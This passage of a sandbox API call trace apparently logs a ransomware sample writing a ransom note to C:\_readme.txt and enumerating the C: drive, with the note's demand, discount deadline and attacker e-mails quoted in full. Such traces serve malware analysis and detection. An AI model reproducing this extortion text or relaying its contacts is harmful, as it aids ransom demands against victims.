[0174.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.049] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.049] PathFindFileNameW (pszPath="") returned="" [0174.049] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.050] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.050] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.051] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x806) returned 0x2d2ec90 [0174.066] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0174.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.066] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0174.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d2f4a0 [0174.067] lstrcpyW (in: lpString1=0x2d2f4a0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.067] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0174.067] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0174.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d371a8 [0174.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x85c) returned 0x2d37a70 [0174.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d37a70, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 1117 [0174.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d382d8 [0174.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d37a70 | out: hHeap=0x6a0000) returned 1 [0174.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d371a8 | out: hHeap=0x6a0000) returned 1 [0174.071] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned 1116 [0174.071] WriteFile (in: hFile=0x580, lpBuffer=0x2d382d8*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x30ffb64, lpOverlapped=0x0 | out: lpBuffer=0x2d382d8*, lpNumberOfBytesWritten=0x30ffb64*=0x45c, lpOverlapped=0x0) returned 1 [0174.072] CloseHandle (hObject=0x580) returned 1 [0174.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d382d8 | out: hHeap=0x6a0000) returned 1 [0174.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2f4a0 | out: hHeap=0x6a0000) returned 1 [0174.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.075] FindFirstFileW (in: lpFileName="C:\\*" (normalized: "c:\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2cbfa10 [0174.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0174.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0174.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d276f8 [0174.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0174.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0174.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0174.076] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0174.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0174.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0174.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0174.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.077] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0174.077] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0174.077] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0174.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0174.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0174.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0174.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0174.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0174.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0174.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0174.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0174.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0174.079] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xcf180940, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0174.079] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xb883f1e0, ftCreationTime.dwHighDateTime=0x1d8a6e8, ftLastAccessTime.dwLowDateTime=0xb883f1e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xb883f1e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0174.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0174.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0174.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0174.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0174.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0174.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0174.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.081] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xcf832720, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0174.081] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0174.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27810 [0174.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0174.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0174.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0174.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0174.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.083] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa10d8470, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa10d8470, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0174.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0174.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0174.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0174.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0174.084] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", 